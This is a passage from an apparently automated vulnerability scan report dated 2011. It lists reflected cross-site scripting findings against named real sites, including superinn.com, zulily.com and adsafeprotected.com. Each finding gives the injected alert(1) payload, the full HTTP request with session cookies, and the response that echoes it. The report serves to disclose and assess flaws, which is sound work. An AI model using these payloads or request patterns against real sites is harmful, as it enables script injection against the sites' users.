Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:12 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=&propid=&rd=&rddate=&nightnum=edd60';alert(1)//6933e5ef7f9&nip=')
}
//alert(parent.frames.length)
</script>

4.287. https://www.superinn.com/frametest.asp [nip parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the nip request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d8d5'%3balert(1)//49b5d938456 was submitted in the nip parameter. This input was echoed as 1d8d5';alert(1)//49b5d938456 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=&propid=&rpn=&rd=&rddate=&nightnum=&nip=1d8d5'%3balert(1)//49b5d938456 HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:15 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=&propid=&rd=&rddate=&nightnum=&nip=1d8d5';alert(1)//49b5d938456')
}
//alert(parent.frames.length)
</script>

4.288. https://www.superinn.com/frametest.asp [propid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the propid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2df56'%3balert(1)//0acb8136b5a was submitted in the propid parameter. This input was echoed as 2df56';alert(1)//0acb8136b5a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=&propid=2df56'%3balert(1)//0acb8136b5a&rpn=&rd=&rddate=&nightnum=&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:00 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=&propid=2df56';alert(1)//0acb8136b5a&rd=&rddate=&nightnum=&nip=')
}
//alert(parent.frames.length)
</script>

4.289. https://www.superinn.com/frametest.asp [rd parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the rd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6224b'%3balert(1)//5623fd652af was submitted in the rd parameter. This input was echoed as 6224b';alert(1)//5623fd652af in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=&propid=&rpn=&rd=6224b'%3balert(1)//5623fd652af&rddate=&nightnum=&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:03 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=&propid=&rd=6224b';alert(1)//5623fd652af&rddate=&nightnum=&nip=')
}
//alert(parent.frames.length)
</script>

4.290. https://www.superinn.com/frametest.asp [rddate parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the rddate request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e40d'%3balert(1)//5af1c17b28d was submitted in the rddate parameter. This input was echoed as 9e40d';alert(1)//5af1c17b28d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=&propid=&rpn=&rd=&rddate=9e40d'%3balert(1)//5af1c17b28d&nightnum=&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:58:08 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=&propid=&rd=&rddate=9e40d';alert(1)//5af1c17b28d&nightnum=&nip=')
}
//alert(parent.frames.length)
</script>

4.291. https://www.superinn.com/frametest.asp [wrnum parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.superinn.com
Path:	/frametest.asp

Issue detail

The value of the wrnum request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ea5'%3balert(1)//fab14a269ae was submitted in the wrnum parameter. This input was echoed as 45ea5';alert(1)//fab14a269ae in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /frametest.asp?dk=The%20Hanover%20House&wrnum=45ea5'%3balert(1)//fab14a269ae&propid=&rpn=&rd=&rddate=&nightnum=&nip= HTTP/1.1
Host: www.superinn.com
Connection: keep-alive
Referer: http://www.hanoverhouseinn.com/specialsfall.shtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDCADAAARA=DJCOLOPAIDLKMBMAHHMNFCFB

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Fri, 12 Aug 2011 03:57:56 GMT
X-Powered-By: ASP.NET
Content-Length: 339
Content-Type: text/html
Cache-control: private

<script type="text/javascript">
if(parent.frames.length!=0) {
window.top.location.replace(document.location.href) }
else {
window.location.replace('https://www.superinn.com/webview1.asp?dk=The Hanover House&rpn=1&wrnum=45ea5';alert(1)//fab14a269ae&propid=&rd=&rddate=&nightnum=&nip=')
}
//alert(parent.frames.length)
</script>

4.292. https://www.zulily.com/index.php/customer/account/create/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.zulily.com
Path:	/index.php/customer/account/create/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 7bf89--><script>alert(1)</script>39129dcf067 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php/customer/account/create/?7bf89--><script>alert(1)</script>39129dcf067=1 HTTP/1.1
Host: www.zulily.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: frontend=t37t9tbsags6oa45ga0pge1hs1

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 01 Sep 2011 15:54:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 01 Sep 2011 15:54:20 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: frontend=le4bhskrqh0vqivjo8eecrk9p5; expires=Fri, 31-Aug-2012 21:43:07 GMT; path=/; domain=.zulily.com
Set-Cookie: ab_modal_register_confirm_pswd=modal_control; expires=Thu, 15-Sep-2011 15:54:21 GMT; path=/
Content-Length: 23805

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="https://www.
...[SNIP]...
<script>alert(1)</script>39129dcf067=1 -->
...[SNIP]...

4.293. http://fw.adsafeprotected.com/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5 [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6a75"-alert(1)-"f36fff604b2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rjsi/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.ic?;ord=634486847201680898? HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=a6a75"-alert(1)-"f36fff604b2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=25D78024A8C0896A610C036D53493825; Path=/
Content-Type: text/html
Date: Thu, 11 Aug 2011 22:40:33 GMT
Connection: close

<html>
<head></head>
<body>
<script type="text/javascript"><!--

var adsafeVisParams = {
   mode : "jsi",
   jsref : "http://www.google.com/search?hl=en&q=a6a75"-alert(1)-"f36fff604b2",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/dc/10449/145817/adi/N5823.InterCLICK/B5763012.5;sz=728x90;click=http://a1.interclick.com/icaid/188574/tid/b50df682-3af4-40bc-830e-667d90bcd4c5/click.i
...[SNIP]...

4.294. http://fw.adsafeprotected.com/rjss/choices.truste.com/10449/9003/ca [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://fw.adsafeprotected.com
Path:	/rjss/choices.truste.com/10449/9003/ca

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ee0e0"-alert(1)-"af928c507e5 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Request

GET /rjss/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10 HTTP/1.1
Host: fw.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=ee0e0"-alert(1)-"af928c507e5
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4DC99CCBFDEA5ECA450887DEC1D88A4C; Path=/
Content-Type: text/javascript
Date: Thu, 11 Aug 2011 22:40:32 GMT
Connection: close

var adsafeVisParams = {
   mode : "jss",
   jsref : "http://www.google.com/search?hl=en&q=ee0e0"-alert(1)-"af928c507e5",
   adsafeSrc : "http://fw.adsafeprotected.com/rfw/choices.truste.com/10449/9003/ca?pid=hp01&aid=hp02&cid=68442935&c=cachebuster&w=728&h=90&plc=tl&js=10",
   adsafeSep : "&",
   requrl : "",
   reqquery : ""
...[SNIP]...

4.295. https://www.zulily.com/index.php/customer/account/create/ [Referer HTTP header] previous

Summary

Severity:	Low
Confidence:	Certain
Host:	https://www.zulily.com
Path:	/index.php/customer/account/create/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 93492--><script>alert(1)</script>78dc5ad6ccd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php/customer/account/create/ HTTP/1.1
Host: www.zulily.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: frontend=t37t9tbsags6oa45ga0pge1hs1
Referer: http://www.google.com/search?hl=en&q=93492--><script>alert(1)</script>78dc5ad6ccd

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Thu, 01 Sep 2011 15:54:23 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Expires: Thu, 01 Sep 2011 15:54:22 GMT
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: frontend=le4bhskrqh0vqivjo8eecrk9p5; expires=Fri, 31-Aug-2012 21:43:09 GMT; path=/; domain=.zulily.com
Set-Cookie: ab_modal_register_confirm_pswd=modal_control; expires=Thu, 15-Sep-2011 15:54:23 GMT; path=/
Content-Length: 23840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="https://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="https://www.
...[SNIP]...
<script>alert(1)</script>78dc5ad6ccd -->
...[SNIP]...

Report generated by XSS.CX at Mon Oct 03 07:28:52 CDT 2011.